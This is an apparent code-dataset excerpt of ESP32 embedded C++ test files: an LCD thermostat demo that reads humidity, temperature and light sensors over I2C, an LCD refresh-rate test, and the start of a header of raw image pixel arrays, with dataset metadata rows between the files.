/*SPI Includes*/
#include "driver/spi_master.h"
#include "iot_lcd.h"
#include "Adafruit_GFX.h"
#include "image.h"
#include "lcd_image.h"
#include "esp_wifi.h"
#include "esp_log.h"
#include "esp_system.h"
#include "esp_event_loop.h"
/*Include desired font here*/
#define PROGMEM
#include "FreeSans9pt7b.h"
#include "FreeMono9pt7b.h"
#include "FreeSerif9pt7b.h"
#include "FreeSerifItalic9pt7b.h"
#include "unity.h"
static CEspLcd* tft_obj = NULL;
//-------------TEST CODE-----------------
float target_room_temperature = 23.5;
int color(uint8_t r, uint8_t g, uint8_t b)
{
return ((r & 248) | g >> 5) << 8 | ((g & 28) << 3 | b >> 3);
}
int drawPlaceholder(CEspLcd* tft, int x, int y, int width, int height, int bordercolor, const char* headertext, int header_text_offset, const GFXfont* font)
{
int headersize = 20;
tft->setTextColor(COLOR_GREEN, COLOR_BLACK);
tft->drawRoundRect(x, y, width, height, 3, bordercolor);
if (font) {
tft->setFont(font);
tft->drawString(headertext, x + header_text_offset, y + 1 + 14);
} else {
tft->drawString(headertext, x + header_text_offset, y + 1);
}
tft->drawFastHLine(x, y + headersize, width, bordercolor);
tft->setFont(NULL);
return y + headersize;
}
const GFXfont* title_font = &FreeSerif9pt7b;
const GFXfont* text_font = &FreeSerif9pt7b;
const GFXfont* num_font = &FreeSerif9pt7b;
void update_huminity(CEspLcd* tft, int hum)
{
tft->setFont(num_font);
char dtmp[10];
memset(dtmp, 0, sizeof(dtmp));
sprintf(dtmp, "%d %%", hum);
tft->fillRect(193, 32, 25, 26, COLOR_BLACK);
tft->drawString(dtmp, 195, 50);
}
void update_brightness(CEspLcd* tft, float bright)
{
tft->fillRect(193, 72, 55, 26, COLOR_BLACK);
tft->drawFloat(bright, 1, 195, 90);
}
void drawTargetTemp(CEspLcd* tft, float temp)
{
tft->setTextColor(COLOR_WHITE, COLOR_BLACK);
tft->drawFloatSevSeg(temp, 1, 7, 54, 7);
}
void drawWireFrame(CEspLcd* tft)
{
tft->setTextColor(COLOR_GREEN, COLOR_BLACK);
//Target placeholder
drawPlaceholder(tft, 0, 28, 136, 78, COLOR_RED, "Temperature", 30, title_font);
tft->setFont(NULL);
//Temperatures placeholder
int placeholderbody = drawPlaceholder(tft, 138, 0, 180, 106, COLOR_RED, "Sensor", 60, title_font);
tft->setTextColor(COLOR_WHITE, COLOR_BLACK);
tft->setFont(num_font);
tft->drawBitmap(150, placeholderbody + 5 , (uint16_t*)water_pic_35, 35, 35);
update_huminity(tft, 68);
tft->drawBitmap(150, placeholderbody + 45 , (uint16_t*)brightness_pic_35, 35, 35);
update_brightness(tft, 1536.12);
//Status placeholder
tft->setTextColor(COLOR_GREEN, COLOR_BLACK);
placeholderbody = drawPlaceholder(tft, 0, 140, 319, 97, COLOR_RED, "STATUS", 110, title_font);
tft->setTextColor(COLOR_WHITE, COLOR_BLACK);
tft->setFont(NULL);
tft->drawString("WiFi : ", 6, placeholderbody + 2);
tft->drawString("Signal : ", 6, placeholderbody + 22);
tft->drawString("Status : ", 6, placeholderbody + 42);
}
void setupUI(CEspLcd* tft)
{
tft->setRotation(3);
tft->fillScreen(COLOR_BLACK);
tft->drawBitmap(0, 0, Status_320_240, 320, 240);
vTaskDelay(1000 / portTICK_PERIOD_MS);
while (1) {
tft->fillRect(0, 0, 320, 240, COLOR_BLUE);
vTaskDelay(500 / portTICK_PERIOD_MS);
tft->fillRect(0, 0, 320, 240, COLOR_GREEN);
vTaskDelay(500 / portTICK_PERIOD_MS);
tft->invertDisplay(1);
tft->drawBitmap(0, 0, Status_320_240, 320, 240);
vTaskDelay(500 / portTICK_PERIOD_MS);
tft->fillScreen(COLOR_BLACK);
tft->drawBitmap(0, 0, esp_logo, 137, 26);
drawWireFrame(tft);
drawTargetTemp(tft, target_room_temperature);
vTaskDelay(500 / portTICK_PERIOD_MS);
break;
}
tft->invertDisplay(0);
tft->fillScreen(COLOR_BLACK);
tft->drawBitmap(0, 0, esp_logo, 137, 26);
drawWireFrame(tft);
drawTargetTemp(tft, target_room_temperature);
}
//=======================================
//--------- SENSOR ----------
#include "driver/i2c.h"
#include "iot_i2c_bus.h"
#include "iot_hts221.h"
#include "iot_bh1750.h"
#define I2C_MASTER_SCL_IO GPIO_NUM_27 /*!< gpio number for I2C master clock */
#define I2C_MASTER_SDA_IO GPIO_NUM_26 /*!< gpio number for I2C master data */
#define I2C_MASTER_NUM I2C_NUM_1 /*!< I2C port number for master dev */
#define I2C_MASTER_TX_BUF_DISABLE 0 /*!< I2C master do not need buffer */
#define I2C_MASTER_RX_BUF_DISABLE 0 /*!< I2C master do not need buffer */
#define I2C_MASTER_FREQ_HZ 100000 /*!< I2C master clock frequency */
static i2c_bus_handle_t i2c_bus = NULL;
static hts221_handle_t hts221 = NULL;
static bh1750_handle_t bh1750 = NULL;
void hts221_test_task()
{
uint8_t hts221_deviceid;
iot_hts221_get_deviceid(hts221, &hts221_deviceid);
printf("hts221 device ID is: %02x\n", hts221_deviceid);
hts221_config_t hts221_config;
iot_hts221_get_config(hts221, &hts221_config);
hts221_config.avg_h = HTS221_AVGH_32;
hts221_config.avg_t = HTS221_AVGT_16;
hts221_config.odr = HTS221_ODR_1HZ;
hts221_config.bdu_status = HTS221_DISABLE;
hts221_config.heater_status = HTS221_DISABLE;
iot_hts221_set_config(hts221, &hts221_config);
iot_hts221_set_activate(hts221);
}
/**
* @brief i2c master initialization
*/
void i2c_sensor_init()
{
// int i2c_master_port = I2C_MASTER_NUM;
i2c_config_t conf;
conf.mode = I2C_MODE_MASTER;
conf.sda_io_num = I2C_MASTER_SDA_IO;
conf.sda_pullup_en = GPIO_PULLUP_ENABLE;
conf.scl_io_num = I2C_MASTER_SCL_IO;
conf.scl_pullup_en = GPIO_PULLUP_ENABLE;
conf.master.clk_speed = I2C_MASTER_FREQ_HZ;
i2c_bus = iot_i2c_bus_create(I2C_MASTER_NUM, &conf);
hts221 = iot_hts221_create(i2c_bus, HTS221_I2C_ADDRESS);
uint8_t hts221_deviceid;
iot_hts221_get_deviceid(hts221, &hts221_deviceid);
printf("hts221 device ID is: %02x\n", hts221_deviceid);
hts221_config_t hts221_config;
iot_hts221_get_config(hts221, &hts221_config);
printf("avg_h is: %02x\n", hts221_config.avg_h);
printf("avg_t is: %02x\n", hts221_config.avg_t);
printf("odr is: %02x\n", hts221_config.odr);
printf("bdu_status is: %02x\n", hts221_config.bdu_status);
printf("heater_status is: %02x\n", hts221_config.heater_status);
printf("irq_level is: %02x\n", hts221_config.irq_level);
printf("irq_output_type is: %02x\n", hts221_config.irq_output_type);
printf("irq_enable is: %02x\n", hts221_config.irq_enable);
hts221_config.avg_h = HTS221_AVGH_32;
hts221_config.avg_t = HTS221_AVGT_16;
hts221_config.odr = HTS221_ODR_1HZ;
hts221_config.bdu_status = HTS221_DISABLE;
hts221_config.heater_status = HTS221_DISABLE;
iot_hts221_set_config(hts221, &hts221_config);
iot_hts221_set_activate(hts221);
bh1750 = iot_bh1750_create(i2c_bus, 0x23);
hts221_test_task();
}
// -------------------------
#define LCD_DATA_TEMP (1)
#define LCD_DATA_HUM (2)
#define LCD_DATA_BRI (3)
QueueHandle_t lcd_data_queue = NULL;
typedef struct
{
int type;
union
{
float temp;
int hum;
float brightness;
};
} lcd_data_t;
extern "C" void demo_lcd_init()
{
if (lcd_data_queue == NULL) {
lcd_data_queue = xQueueCreate(10, sizeof(lcd_data_t));
}
/*Initialize LCD*/
lcd_conf_t lcd_pins = {
.lcd_model = LCD_MOD_AUTO_DET,
.pin_num_miso = GPIO_NUM_25,
.pin_num_mosi = GPIO_NUM_23,
.pin_num_clk = GPIO_NUM_19,
.pin_num_cs = GPIO_NUM_22,
.pin_num_dc = GPIO_NUM_21,
.pin_num_rst = GPIO_NUM_18,
.pin_num_bckl = GPIO_NUM_5,
.clk_freq = 30000000,
.rst_active_level = 0,
.bckl_active_level = 0,
.spi_host = HSPI_HOST,
.init_spi_bus = true,
};
if (tft_obj == NULL) {
tft_obj = new CEspLcd(&lcd_pins);
}
setupUI(tft_obj);
}
void lcd_update_task(void* arg)
{
lcd_data_t data;
while (1) {
int ret = xQueueReceive(lcd_data_queue, &data, portMAX_DELAY);
if (ret == pdTRUE) {
switch (data.type) {
case LCD_DATA_TEMP:
printf("val recv: %f\n", data.temp);
drawTargetTemp(tft_obj, data.temp);
break;
case LCD_DATA_HUM:
printf("recv hum: %d\n", data.hum);
update_huminity(tft_obj, data.hum);
break;
case LCD_DATA_BRI:
printf("recv bri: %f\n", data.brightness);
update_brightness(tft_obj, data.brightness);
break;
default:
printf("data type error: %d\n", data.type);
}
}
}
}
void demo_sensor_read_task(void* arg)
{
int16_t temperature, temperature_last = 0;
int16_t humidity, humidity_last = 0;
float bh1750_data, bh1750_data_last = 0;
lcd_data_t data;
while (1) {
printf("\n********HTS221 HUMIDITY&TEMPERATURE SENSOR********\n");
iot_hts221_get_humidity(hts221, &humidity);
printf("humidity value is: %2.2f\n", (float)humidity / 10);
iot_hts221_get_temperature(hts221, &temperature);
printf("temperature value is: %2.2f\n", (float)temperature / 10);
if (temperature_last != temperature) {
data.type = LCD_DATA_TEMP;
data.temp = (float) temperature / 10;
printf("send temp: %f\n", data.temp);
xQueueSend(lcd_data_queue, &data, portMAX_DELAY);
temperature_last = temperature;
}
if (humidity_last != humidity) {
data.type = LCD_DATA_HUM;
data.hum = humidity / 10;
printf("send hum: %d\n", data.hum);
xQueueSend(lcd_data_queue, &data, portMAX_DELAY);
humidity_last = humidity;
}
iot_bh1750_power_on(bh1750);
iot_bh1750_set_measure_mode(bh1750, BH1750_ONETIME_4LX_RES);
vTaskDelay(30 / portTICK_RATE_MS);
iot_bh1750_get_data(bh1750, &bh1750_data);
printf("brightness: %f\n", bh1750_data);
if (bh1750_data_last != bh1750_data) {
data.type = LCD_DATA_BRI;
data.brightness = bh1750_data;
printf("send hum: %f\n", data.brightness);
xQueueSend(lcd_data_queue, &data, portMAX_DELAY);
bh1750_data_last = bh1750_data;
}
vTaskDelay(2000 / portTICK_PERIOD_MS);
}
}
TEST_CASE("LCD thermostat test", "[lcd_demo][iot]")
{
i2c_sensor_init();
demo_lcd_init();
xTaskCreate(lcd_update_task, "lcd_update_task", 2048 * 2, NULL, 10, NULL);
xTaskCreate(demo_sensor_read_task, "demo_sensor_read_task", 2048, NULL, 10, NULL);
}
| 11,988 | lcd_thermostat | cpp | en | cpp | code | {"qsc_code_num_words": 1632, "qsc_code_num_chars": 11988.0, "qsc_code_mean_word_length": 4.55453431, "qsc_code_frac_words_unique": 0.23590686, "qsc_code_frac_chars_top_2grams": 0.04197498, "qsc_code_frac_chars_top_3grams": 0.00807211, "qsc_code_frac_chars_top_4grams": 0.01614422, "qsc_code_frac_chars_dupe_5grams": 0.30216602, "qsc_code_frac_chars_dupe_6grams": 0.27620073, "qsc_code_frac_chars_dupe_7grams": 0.21027849, "qsc_code_frac_chars_dupe_8grams": 0.18337145, "qsc_code_frac_chars_dupe_9grams": 0.18027714, "qsc_code_frac_chars_dupe_10grams": 0.16897619, "qsc_code_frac_chars_replacement_symbols": 0.0, "qsc_code_frac_chars_digital": 0.0735357, "qsc_code_frac_chars_whitespace": 0.21955289, "qsc_code_size_file_byte": 11988.0, "qsc_code_num_lines": 370.0, "qsc_code_num_chars_line_max": 157.0, "qsc_code_num_chars_line_mean": 32.4, "qsc_code_frac_chars_alphabet": 0.72092775, "qsc_code_frac_chars_comments": 0.1309643, "qsc_code_cate_xml_start": 0.0, "qsc_code_frac_lines_dupe_lines": 0.22377622, "qsc_code_cate_autogen": 0.0, "qsc_code_frac_lines_long_string": 0.0, "qsc_code_frac_chars_string_length": 0.08390937, "qsc_code_frac_chars_long_word_length": 0.00633641, "qsc_code_frac_lines_string_concat": 0.0, "qsc_code_cate_encoded_data": 0.0, "qsc_code_frac_chars_hex_words": 0.00038402, "qsc_code_frac_lines_prompt_comments": 0.0, "qsc_code_frac_lines_assert": 0.0, "qsc_codecpp_frac_lines_preprocessor_directives": 0.12587413, "qsc_codecpp_frac_lines_func_ratio": 0.04545455, "qsc_codecpp_cate_bitsstdc": 0.0, "qsc_codecpp_nums_lines_main": 0.0, "qsc_codecpp_frac_lines_goto": 0.0, "qsc_codecpp_cate_var_zero": 0.0, "qsc_codecpp_score_lines_no_logic": 0.14685315, "qsc_codecpp_frac_lines_print": 0.07692308} | 1 | {"qsc_code_frac_chars_replacement_symbols": 0, "qsc_code_num_words": 0, "qsc_code_num_chars": 0, "qsc_code_mean_word_length": 0, "qsc_code_frac_chars_top_2grams": 0, "qsc_code_frac_chars_top_3grams": 0, "qsc_code_frac_chars_top_4grams": 0, "qsc_code_frac_chars_dupe_5grams": 0, "qsc_code_frac_chars_dupe_6grams": 0, "qsc_code_frac_chars_dupe_7grams": 0, "qsc_code_frac_chars_dupe_8grams": 0, "qsc_code_frac_chars_dupe_9grams": 0, "qsc_code_frac_chars_dupe_10grams": 0, "qsc_code_frac_lines_dupe_lines": 0, "qsc_code_size_file_byte": 0, "qsc_code_num_lines": 0, "qsc_code_num_chars_line_max": 0, "qsc_code_num_chars_line_mean": 0, "qsc_code_frac_chars_alphabet": 0, "qsc_code_frac_chars_digital": 0, "qsc_code_frac_chars_whitespace": 0, "qsc_code_frac_chars_comments": 0, "qsc_code_cate_xml_start": 0, "qsc_code_cate_autogen": 0, "qsc_code_frac_lines_long_string": 0, "qsc_code_frac_chars_string_length": 0, "qsc_code_frac_chars_long_word_length": 0, "qsc_code_cate_encoded_data": 0, "qsc_code_frac_chars_hex_words": 0, "qsc_code_frac_lines_prompt_comments": 0, "qsc_code_frac_lines_assert": 0, "qsc_codecpp_frac_lines_func_ratio": 0, "qsc_codecpp_nums_lines_main": 0, "qsc_codecpp_score_lines_no_logic": 0, "qsc_codecpp_frac_lines_preprocessor_directives": 0, "qsc_codecpp_frac_lines_print": 0} |
0015/ESP32-OpenCV-Projects | esp32/examples/color_code/components/lcd/test/lcd_refresh.cpp | /*
* ESPRESSIF MIT License
*
* Copyright (c) 2017 <ESPRESSIF SYSTEMS (SHANGHAI) PTE LTD>
*
* Permission is hereby granted for use on ESPRESSIF SYSTEMS products only, in which case,
* it is free of charge, to any person obtaining a copy of this software and associated
* documentation files (the "Software"), to deal in the Software without restriction, including
* without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense,
* and/or sell copies of the Software, and to permit persons to whom the Software is furnished
* to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included in all copies or
* substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS
* FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR
* COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER
* IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
* CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
*
*/
#include "lwip/api.h"
#include "iot_lcd.h"
#include "iot_wifi_conn.h"
#include "nvs_flash.h"
#include "esp_event_loop.h"
#include "freertos/event_groups.h"
#include "lcd_image.h"
#define PROGMEM
#include "FreeSans9pt7b.h"
#include "unity.h"
static const char* TAG = "LCD_REFRESH";
static CEspLcd* tft = NULL;
extern "C" void app_lcd_task(void *pvParameters)
{
uint8_t i = 0;
uint32_t time = 0;
time = xTaskGetTickCount();
while(1) {
if((xTaskGetTickCount() - time) > 1000 / portTICK_RATE_MS ) {
ESP_LOGI(TAG,"refresh %d fps", i);
time = xTaskGetTickCount();
i = 0;
}
i++;
tft->drawBitmap(0, 0, i > 150 ? (uint16_t *)pic1_320_240 : (uint16_t *)Status_320_240, 320, 240);
}
}
extern "C" void app_lcd_init()
{
lcd_conf_t lcd_pins = {
.lcd_model = LCD_MOD_AUTO_DET,
.pin_num_miso = GPIO_NUM_25,
.pin_num_mosi = GPIO_NUM_23,
.pin_num_clk = GPIO_NUM_19,
.pin_num_cs = GPIO_NUM_22,
.pin_num_dc = GPIO_NUM_21,
.pin_num_rst = GPIO_NUM_18,
.pin_num_bckl = GPIO_NUM_5,
.clk_freq = 80 * 1000 * 1000,
.rst_active_level = 0,
.bckl_active_level = 0,
.spi_host = HSPI_HOST,
.init_spi_bus = true,
};
/*Initialize SPI Handler*/
if (tft == NULL) {
tft = new CEspLcd(&lcd_pins);
}
/*screen initialize*/
tft->invertDisplay(false);
tft->setRotation(1);
tft->fillScreen(COLOR_GREEN);
}
TEST_CASE("LCD refresh test", "[lcd_refresh][iot]")
{
app_lcd_init();
vTaskDelay(500 / portTICK_RATE_MS);
ESP_LOGI(TAG, "Free heap: %u", xPortGetFreeHeapSize());
ESP_LOGI(TAG, "get free size of 32BIT heap : %d\n",
heap_caps_get_free_size(MALLOC_CAP_32BIT));
ESP_LOGD(TAG, "Starting app_lcd_task...");
xTaskCreate(&app_lcd_task, "app_lcd_task", 4096, NULL, 4, NULL);
}
| 3,152 | lcd_refresh | cpp | en | cpp | code | {"qsc_code_num_words": 455, "qsc_code_num_chars": 3152.0, "qsc_code_mean_word_length": 4.45714286, "qsc_code_frac_words_unique": 0.49010989, "qsc_code_frac_chars_top_2grams": 0.0433925, "qsc_code_frac_chars_top_3grams": 0.01972387, "qsc_code_frac_chars_top_4grams": 0.01380671, "qsc_code_frac_chars_dupe_5grams": 0.04043393, "qsc_code_frac_chars_dupe_6grams": 0.02366864, "qsc_code_frac_chars_dupe_7grams": 0.0, "qsc_code_frac_chars_dupe_8grams": 0.0, "qsc_code_frac_chars_dupe_9grams": 0.0, "qsc_code_frac_chars_dupe_10grams": 0.0, "qsc_code_frac_chars_replacement_symbols": 0.0, "qsc_code_frac_chars_digital": 0.03396072, "qsc_code_frac_chars_whitespace": 0.22461929, "qsc_code_size_file_byte": 3152.0, "qsc_code_num_lines": 97.0, "qsc_code_num_chars_line_max": 106.0, "qsc_code_num_chars_line_mean": 32.49484536, "qsc_code_frac_chars_alphabet": 0.79582651, "qsc_code_frac_chars_comments": 0.40640863, "qsc_code_cate_xml_start": 0.0, "qsc_code_frac_lines_dupe_lines": 0.03278689, "qsc_code_cate_autogen": 0.0, "qsc_code_frac_lines_long_string": 0.0, "qsc_code_frac_chars_string_length": 0.13949759, "qsc_code_frac_chars_long_word_length": 0.01229289, "qsc_code_frac_lines_string_concat": 0.0, "qsc_code_cate_encoded_data": 0.0, "qsc_code_frac_chars_hex_words": 0.0, "qsc_code_frac_lines_prompt_comments": 0.0, "qsc_code_frac_lines_assert": 0.0, "qsc_codecpp_frac_lines_preprocessor_directives": 0.16393443, "qsc_codecpp_frac_lines_func_ratio": 0.04918033, "qsc_codecpp_cate_bitsstdc": 0.0, "qsc_codecpp_nums_lines_main": 0.0, "qsc_codecpp_frac_lines_goto": 0.0, "qsc_codecpp_cate_var_zero": 0.0, "qsc_codecpp_score_lines_no_logic": 0.19672131, "qsc_codecpp_frac_lines_print": 0.0} | 1 | {"qsc_code_frac_chars_replacement_symbols": 0, "qsc_code_num_words": 0, "qsc_code_num_chars": 0, "qsc_code_mean_word_length": 0, "qsc_code_frac_chars_top_2grams": 0, "qsc_code_frac_chars_top_3grams": 0, "qsc_code_frac_chars_top_4grams": 0, "qsc_code_frac_chars_dupe_5grams": 0, "qsc_code_frac_chars_dupe_6grams": 0, "qsc_code_frac_chars_dupe_7grams": 0, "qsc_code_frac_chars_dupe_8grams": 0, "qsc_code_frac_chars_dupe_9grams": 0, "qsc_code_frac_chars_dupe_10grams": 0, "qsc_code_frac_lines_dupe_lines": 0, "qsc_code_size_file_byte": 0, "qsc_code_num_lines": 0, "qsc_code_num_chars_line_max": 0, "qsc_code_num_chars_line_mean": 0, "qsc_code_frac_chars_alphabet": 0, "qsc_code_frac_chars_digital": 0, "qsc_code_frac_chars_whitespace": 0, "qsc_code_frac_chars_comments": 0, "qsc_code_cate_xml_start": 0, "qsc_code_cate_autogen": 0, "qsc_code_frac_lines_long_string": 0, "qsc_code_frac_chars_string_length": 0, "qsc_code_frac_chars_long_word_length": 0, "qsc_code_cate_encoded_data": 0, "qsc_code_frac_chars_hex_words": 0, "qsc_code_frac_lines_prompt_comments": 0, "qsc_code_frac_lines_assert": 0, "qsc_codecpp_frac_lines_func_ratio": 0, "qsc_codecpp_nums_lines_main": 0, "qsc_codecpp_score_lines_no_logic": 0, "qsc_codecpp_frac_lines_preprocessor_directives": 0, "qsc_codecpp_frac_lines_print": 0} |
0015/ESP32-OpenCV-Projects | esp32/examples/color_code/components/lcd/test/lcd_image.h | const uint16_t pic1_320_240[] = {
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
